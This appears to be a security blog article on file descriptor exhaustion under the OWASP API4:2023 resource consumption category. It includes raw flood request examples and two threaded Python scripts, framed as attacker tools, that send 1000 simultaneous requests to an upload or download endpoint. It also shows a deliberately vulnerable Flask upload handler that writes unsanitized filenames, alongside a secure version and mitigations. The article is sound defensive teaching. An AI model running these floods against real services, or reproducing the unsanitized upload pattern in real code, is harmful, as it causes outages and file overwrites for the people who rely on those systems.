
Unrestricted Resource Consumption: Managing Maximum Number of File Descriptors

Senad Cavkusic
8 min read · May 21, 2024

I have already explained execution timeouts and maximum allocatable memory. Today, I will continue with the next subject under API4:2023 Unrestricted Resource Consumption: managing the maximum number of file descriptors.

Managing Maximum Number of File Descriptors

Understanding Maximum Number of File Descriptors

File descriptors are a fundamental part of operating systems, representing references to open files, network sockets, and other resources. Setting an upper limit on the number of file descriptors that can be allocated is crucial for preventing a single API call from exhausting system resources, which can lead to denial of service (DoS) attacks, performance degradation, and system crashes.

Without a cap on the number of file descriptors, an API request can potentially consume all available file descriptors, leaving none for other processes or users. By enforcing a maximum file descriptor limit, organizations can ensure that their systems remain responsive and stable, even under heavy load or during attacks.
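On Unix-like systems, such a cap can be enforced at the process level before any request handling begins. Below is a minimal sketch using Python's standard `resource` module (Unix/Linux only; the limit of 1024 is purely illustrative):

```python
import resource

# Read the current per-process descriptor limits (Unix only).
soft, hard = resource.getrlimit(resource.RLIMIT_NOFILE)

# Lower the soft limit; the hard limit is the ceiling an unprivileged
# process may not exceed. 1024 here is an illustrative value.
new_soft = 1024 if hard == resource.RLIM_INFINITY else min(1024, hard)
resource.setrlimit(resource.RLIMIT_NOFILE, (new_soft, hard))

print(resource.getrlimit(resource.RLIMIT_NOFILE))
```

The same control is available without code changes through the shell (`ulimit -n`), systemd (`LimitNOFILE=`), or container runtime settings.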

The Risks of Unrestricted File Descriptor Allocation

APIs without well-defined limits on file descriptors are particularly susceptible to DoS attacks. In these scenarios, malicious actors can send requests designed to open a large number of files or network connections, exhausting the server’s resources. This can be especially damaging if the API performs operations that involve numerous file or socket interactions.

For instance, consider an API endpoint that handles file uploads and downloads. If an attacker opens a large number of file handles simultaneously, the server might run out of file descriptors, leading to service unavailability.

In the context of the HTTP request and response communication, a file descriptor is an abstract indicator for accessing files or other input/output resources, such as pipes, sockets, or devices. Each file descriptor is a non-negative integer that uniquely identifies an open file within a process.
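These integers can be observed directly from Python via `fileno()` (a quick sketch; the exact numbers depend on what the process already has open):

```python
import socket
import tempfile

# Descriptors 0, 1, and 2 are conventionally stdin, stdout, and stderr,
# so newly opened resources typically start at 3.
f = tempfile.TemporaryFile()   # an open file
s = socket.socket()            # a network socket

# Both draw small, distinct, non-negative integers from the same table.
print(f.fileno(), s.fileno())

s.close()
f.close()
```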

Here’s a more detailed explanation of how file descriptors are involved in the given HTTP request:

File Descriptor in HTTP Requests

When a server receives an HTTP request, it performs several operations that involve file descriptors:

  • Network Sockets — The server uses file descriptors to manage network connections. Each open network connection, whether for receiving the request or sending the response, is associated with a file descriptor.
  • File Handling — If the request involves file operations (e.g., uploading or downloading files), the server will use file descriptors to open, read, write, and close files.
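Both kinds of descriptor draw from the same per-process table, which on Linux can be inspected under `/proc/self/fd`. A Linux-specific sketch:

```python
import os
import socket

def open_fd_count() -> int:
    # One directory entry per open descriptor (Linux-specific path).
    return len(os.listdir("/proc/self/fd"))

before = open_fd_count()
s = socket.socket()   # each open connection costs one descriptor
print(open_fd_count() - before)
s.close()
```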

Malicious Raw Requests Example:

POST /upload_files HTTP/1.1
Host: example.com
Content-Type: multipart/form-data; boundary=boundary
Content-Length: 1000000

--boundary
Content-Disposition: form-data; name="file1"; filename="file1.txt"
Content-Type: text/plain

(file content here)
--boundary
Content-Disposition: form-data; name="file2"; filename="file2.txt"
Content-Type: text/plain

(file content here)

(repeated many times to exhaust file descriptors)
--boundary--

File Descriptors in Action:

Network Connection:

  • When the client sends this request to the server, the server opens a network socket to receive the request. This socket is associated with a file descriptor.

File Upload Handling:

  • As the server processes the multipart/form-data request, it opens each uploaded file using a file descriptor. For example:
      • file1.txt is opened with a file descriptor (e.g., FD 3).
      • file2.txt is opened with a file descriptor (e.g., FD 4).

If the server receives many such requests in quick succession, or if a single request contains many file parts, it will need to open numerous file descriptors to handle the connections and file operations. This can lead to exhaustion of the available file descriptors, resulting in the server’s inability to open new files or accept new connections.
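This failure mode is easy to reproduce locally by lowering the soft limit and opening files until the kernel refuses. A self-contained Unix sketch (64 is an arbitrary low cap chosen so the loop fails quickly):

```python
import errno
import resource
import tempfile

soft, hard = resource.getrlimit(resource.RLIMIT_NOFILE)
resource.setrlimit(resource.RLIMIT_NOFILE, (64, hard))  # artificially low cap

handles = []
try:
    while True:
        handles.append(tempfile.TemporaryFile())  # one descriptor per file
except OSError as e:
    # errno.EMFILE is the kernel's "Too many open files" error
    print(f"exhausted after {len(handles)} opens: {e}")
finally:
    for h in handles:
        h.close()
    resource.setrlimit(resource.RLIMIT_NOFILE, (soft, hard))  # restore
```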

Response Example:

HTTP/1.1 500 Internal Server Error
Content-Type: application/json

{
  "error": "Too many open files"
}

Python Script Example:

Below is an example of a Python script that an attacker could use to launch such an attack by repeatedly sending HTTP POST requests to the vulnerable endpoint.

import requests
import threading

def send_request(url, files):
    try:
        response = requests.post(url, files=files)
        print(f"Status Code: {response.status_code}")
    except Exception as e:
        print(f"Request failed: {e}")

def launch_attack(url, num_threads, files):
    threads = []
    for _ in range(num_threads):
        thread = threading.Thread(target=send_request, args=(url, files))
        threads.append(thread)
        thread.start()

    for thread in threads:
        thread.join()

if __name__ == "__main__":
    target_url = "http://example.com/upload_files"
    number_of_threads = 1000  # Number of simultaneous requests
    files = {'file1': ('file1.txt', 'file content here'), 'file2': ('file2.txt', 'file content here')}

    launch_attack(target_url, number_of_threads, files)

Explanation:

Network Connection Descriptors:

  • Each thread opens a network connection to the server, consuming a file descriptor for the socket.

File Handling Descriptors:

  • Each request processed by the server results in the server opening file descriptors for file1.txt and file2.txt.

By sending numerous requests simultaneously, the script can cause the server to exhaust its available file descriptors, leading to errors such as “Too many open files” and potential denial of service.
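On the server side, the "Too many open files" condition can at least be surfaced gracefully instead of crashing the worker. A hedged sketch using Flask (matching the framework used later in this post; the endpoint simulates the failure and the messages are illustrative):

```python
import errno

from flask import Flask, jsonify

app = Flask(__name__)

@app.errorhandler(OSError)
def handle_os_error(e):
    # EMFILE means this process hit its descriptor limit: answer with a
    # retryable 503 instead of an unhandled crash.
    if e.errno == errno.EMFILE:
        return jsonify({"error": "Too many open files, try again later"}), 503
    raise e

@app.route('/upload_files', methods=['POST'])
def upload_files():
    # Simulates the OSError a real handler would raise under descriptor
    # exhaustion (illustrative only).
    raise OSError(errno.EMFILE, "Too many open files")
```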

Real-World Scenario: Cloud Storage API

Consider a cloud storage API that allows users to upload and download files. One significant risk is an operation that opens too many file descriptors, such as handling multiple simultaneous uploads or downloads.

When an operation consumes too many file descriptors, it can cause the server to hit the maximum file descriptor limit, significantly slowing down performance or causing the server to refuse new connections. In extreme cases, the server may run out of file descriptors entirely, leading to crashes and service outages.

For example, if a user attempts to download a large number of files simultaneously and the API tries to open all these files at once, it might exceed the available file descriptors, causing the downloads to fail and the server to become unresponsive.

Malicious Raw Requests Example:

GET /download_file?filename=file1.txt HTTP/1.1
Host: example.com
(repeated many times in quick succession)

Response Example:

HTTP/1.1 500 Internal Server Error
Content-Type: application/json

{
  "error": "Too many open files"
}

Python Script Example:

Below is an example of a Python script that an attacker could use to launch such an attack by repeatedly sending HTTP GET requests to the vulnerable endpoint.

import requests
import threading

def send_request(url):
    try:
        response = requests.get(url)
        print(f"Status Code: {response.status_code}")
    except Exception as e:
        print(f"Request failed: {e}")

def launch_attack(url, num_threads):
    threads = []
    for _ in range(num_threads):
        thread = threading.Thread(target=send_request, args=(url,))
        threads.append(thread)
        thread.start()

    for thread in threads:
        thread.join()

if __name__ == "__main__":
    target_url = "http://example.com/download_file?filename=file1.txt"
    number_of_threads = 1000  # Number of simultaneous requests

    launch_attack(target_url, number_of_threads)

Explanation:

Function send_request(url):

  • This function sends a single HTTP GET request to the specified URL using the requests library.
  • It prints the status code of the response or an error message if the request fails.

Function launch_attack(url, num_threads):

  • This function launches the attack by creating multiple threads.
  • Each thread sends an HTTP GET request to the target URL.
  • It takes two parameters: the target URL and the number of threads (simultaneous requests).

Main block:

  • The target_url variable is set to the vulnerable endpoint.
  • The number_of_threads variable defines how many simultaneous requests will be sent (1000 in this example).
  • The launch_attack function is called with the target URL and the number of threads.

This script demonstrates a simple but effective way to exhaust the server’s file descriptors by opening a large number of connections simultaneously. This can lead to resource exhaustion and potentially cause the server to crash or become unresponsive.

Strategies for Effective File Descriptor Management

  • Define File Descriptor Limits — Establish clear limits for the number of file descriptors on a per-request basis. This can be done through configuration settings in your API server or application framework. For example, you can set file descriptor limits in your server’s configuration file to ensure that no single request can open more than a predefined number of file descriptors.
  • Monitor File Descriptor Usage — Implement monitoring tools to track file descriptor usage in real-time. This helps in identifying abnormal usage patterns that might indicate an attack or a bug. Tools like Prometheus, Grafana, or built-in cloud provider monitoring solutions can be employed to keep an eye on file descriptor usage.
  • Graceful Degradation and Error Handling — Ensure that your API can gracefully handle file descriptor allocation errors. This means catching exceptions related to file descriptor limits and responding with appropriate error messages, rather than allowing the server to crash. Implementing a circuit breaker pattern can also help in isolating file descriptor-intensive operations and preventing them from affecting the entire system.
  • Optimize File Handling Operations — Review and optimize the file handling operations in your API. Use efficient file handling techniques and avoid opening too many file descriptors simultaneously. For example, consider using file streaming or chunking to process large files without opening them entirely into memory.
  • Leverage Caching — Use caching mechanisms to reduce the need for repeated file descriptor-intensive operations. By caching the results of expensive operations, you can serve subsequent requests from the cache, reducing file descriptor usage and improving response times.
  • Throttling and Rate Limiting — Implement throttling and rate limiting to control the number of requests hitting your API. By limiting the number of concurrent requests, you can prevent file descriptor exhaustion due to excessive load.
  • Resource Cleanup — Ensure that resources are properly cleaned up after use. This includes closing file handles and network connections. Implementing a robust resource cleanup strategy helps in preventing resource leaks and ensures that file descriptors are freed up for other operations.
  • Stress Testing — Conduct regular stress testing to evaluate how your API handles high file descriptor usage scenarios. Stress testing helps in identifying potential bottlenecks and weaknesses in your file descriptor management strategy. Tools like Apache JMeter or locust.io can be used to simulate high load conditions and assess the performance of your API.
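Several of the strategies above can be combined in a few lines: a counting semaphore caps how many file handles one worker holds at once, and `with` blocks guarantee cleanup even on failure. A sketch (the limit of 32 and the helper name `write_upload` are illustrative, not a recommendation):

```python
import threading

MAX_OPEN_FILES = 32  # illustrative per-worker cap
fd_gate = threading.BoundedSemaphore(MAX_OPEN_FILES)

def write_upload(path: str, data: bytes) -> None:
    # Block until a descriptor "slot" is free; the nested with-blocks
    # release both the slot and the file handle when the write finishes.
    with fd_gate:
        with open(path, "wb") as f:
            f.write(data)
```

Because `BoundedSemaphore` blocks rather than fails, excess requests queue up instead of exhausting descriptors, which pairs naturally with the throttling and rate limiting described above.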

Code Examples

Vulnerable Example:

from flask import Flask, request, jsonify

app = Flask(__name__)

# Vulnerable endpoint that does not limit file descriptor usage
@app.route('/upload_files', methods=['POST'])
def upload_files():
    files = request.files.getlist('files')
    uploaded_files = []
    for file in files:
        # Dangerous: no cap on how many files one request may supply,
        # and the client-supplied filename is used unsanitized
        with open(f'/uploads/{file.filename}', 'wb') as f:
            f.write(file.read())
        uploaded_files.append(file.filename)
    return jsonify(uploaded_files)

if __name__ == '__main__':
    app.run(debug=True)

Secure Example:

from flask import Flask, request, jsonify
from werkzeug.utils import secure_filename
import os

app = Flask(__name__)

UPLOAD_FOLDER = '/uploads'
MAX_FILES_PER_REQUEST = 10  # cap on file handles one request may open
app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER

# Secure endpoint that limits file descriptor usage
@app.route('/upload_files', methods=['POST'])
def upload_files():
    files = request.files.getlist('files')
    # Reject requests that would open too many descriptors
    if len(files) > MAX_FILES_PER_REQUEST:
        return jsonify({'error': 'Too many files in one request'}), 413
    uploaded_files = []
    for file in files:
        filename = secure_filename(file.filename)
        file_path = os.path.join(app.config['UPLOAD_FOLDER'], filename)
        # Open files one at a time so each handle is closed before the next
        with open(file_path, 'wb') as f:
            f.write(file.read())
        uploaded_files.append(filename)
    return jsonify(uploaded_files)

if __name__ == '__main__':
    app.run(debug=True)

In the secure example, the `upload_files` function sanitizes each filename with `secure_filename` and opens and closes each file handle individually, so descriptors are released as soon as each file is written instead of accumulating across the request. This prevents a single upload from holding many file descriptors open simultaneously and mitigates the risk of excessive resource consumption.

Conclusion

By addressing the challenge of unrestricted resource consumption through well-defined file descriptor limits, organizations can significantly enhance their API security posture. This not only prevents service disruptions and system instability but also ensures robust and reliable service delivery. As we continue to explore API security, our next discussion will focus on additional strategies to further mitigate this critical vulnerability.

Stay informed and stay safe!

Written by Senad Cavkusic

Master of Cyber Security | Senior Security Researcher | CEH | CPT | CDFE | Certified ISO 27001 Lead Implementer | Developer | linkedin.com/in/senad-cavkusic
